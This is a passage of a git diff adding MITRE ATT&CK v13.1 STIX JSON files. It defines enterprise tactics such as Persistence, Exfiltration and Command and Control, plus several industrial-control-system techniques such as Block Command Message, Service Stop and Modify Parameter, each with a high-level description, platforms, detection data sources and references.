"enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8", + "type": "x-mitre-tactic", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0040", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0040" + } + ], + "modified": "2019-07-25T18:42:23.222Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n \nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries\u2019 goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json new file mode 100644 index 0000000000000000000000000000000000000000..e28a1d6c4f1a2c17b2d351501dbfc2c9e2e6af85 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--028714d1-6071-455a-9b4b-2df53d132651", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0003", + "url": "https://attack.mitre.org/tactics/TA0003", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:42:33.899Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json new file mode 100644 index 0000000000000000000000000000000000000000..918adb2ff32cd8f408ded7d4a497298fc2ad5e99 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2904a825-3f86-4ce9-a002-04bac635ae31", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0004", + "url": "https://attack.mitre.org/tactics/TA0004", + "source_name": "mitre-attack" + } + ], + "modified": "2021-01-06T14:21:21.641Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json new file mode 100644 index 0000000000000000000000000000000000000000..ede10de82ebcba4a011f6e3d949752620be15e06 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8bebb4ac-981e-436b-946c-8d72e0ad2ec3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0008", + "url": "https://attack.mitre.org/tactics/TA0008", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:36.953Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json new file mode 100644 index 0000000000000000000000000000000000000000..91452d3f3729038899906cfe1ce0d66e24ada14b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--968f956d-16c9-4fb0-9250-4fcc0b7e620c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0005", + "url": "https://attack.mitre.org/tactics/TA0005", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:43:23.473Z", + "name": "Defense Evasion", + "description": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json new file mode 100644 index 0000000000000000000000000000000000000000..dd5109486df7c63753a7ab9bd8a05189e38770d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6f57265a-51c4-43f1-963c-308fe3692c19", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0010", + "url": "https://attack.mitre.org/tactics/TA0010", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:45:12.806Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they\u2019ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json new file mode 100644 index 0000000000000000000000000000000000000000..1d644ee90ff6cf59d3ca2ba9b7b71b8dd922f08a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4f290fd7-4d6e-41e1-b08a-13d7969782e4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0007", + "url": "https://attack.mitre.org/tactics/TA0007", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:13.228Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json new file mode 100644 index 0000000000000000000000000000000000000000..902ffd605010bcbe6b641cc9adea7e55fa657406 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9bbfc092-ab08-43a8-a961-63fd204a3d3f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0009", + "url": "https://attack.mitre.org/tactics/TA0009", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:53.176Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json new file mode 100644 index 0000000000000000000000000000000000000000..cc144c73dde11670745abd37af48721b1c827805 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c1efb457-1bd5-4c78-87e8-774218d8c3ca", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", + "type": "x-mitre-tactic", + "created": "2020-09-30T16:11:59.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0042", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0042" + } + ], + "modified": "2020-09-30T16:31:36.322Z", + "name": "Resource Development", + "description": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "resource-development" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json new file mode 100644 index 0000000000000000000000000000000000000000..ed9fa86af4a9109eccc97b26b1caf92085bcde04 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a52db7ce-379d-442e-9fe7-3a4d6375f8ee", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "type": "x-mitre-tactic", + "created": "2020-10-02T14:48:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0043", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0043" + } + ], + "modified": "2020-10-18T02:04:50.842Z", + "name": "Reconnaissance", + "description": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "reconnaissance" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json new file mode 100644 index 0000000000000000000000000000000000000000..0a49613eee1f877e138317a6251a61720d3e410c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3faf1d15-885f-428e-8b95-405a68aedfce", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0011", + "url": "https://attack.mitre.org/tactics/TA0011", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:45:30.644Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim\u2019s network structure and defenses.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json new file mode 100644 index 0000000000000000000000000000000000000000..9681281fa0facfc4213a046aed5df35aff4ae738 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--5e2ad04a-7acb-4769-853d-e4f2b2c78d8f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0001", + "url": "https://attack.mitre.org/tactics/TA0001", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:41:41.425Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json new file mode 100644 index 0000000000000000000000000000000000000000..70ea1cd745cb8a63df01ed87c054ae5d697d83c0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--24c2c656-e8bf-4ca2-a206-e69f101e3ef3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Block Command Message", + "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Process: Process Termination" + ], + "type": "attack-pattern", + "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0803", + "external_id": "T0803" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json new file mode 100644 index 0000000000000000000000000000000000000000..91314e6512e0b8fa48557e46e589ecc9c1c8f5a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c8289b0b-14f7-4150-b403-d0d853797508", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Process: Process Termination", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution", + "Service: Service Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0881", + "external_id": "T0881" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json new file mode 100644 index 0000000000000000000000000000000000000000..4c73578dd8d152be31b39e0ca113901df97c5e95 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--575cf97f-064b-4d37-a97a-16a08adeaec8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:15:29.756Z", + "name": "Modify Parameter", + "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Human-Machine Interface" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": 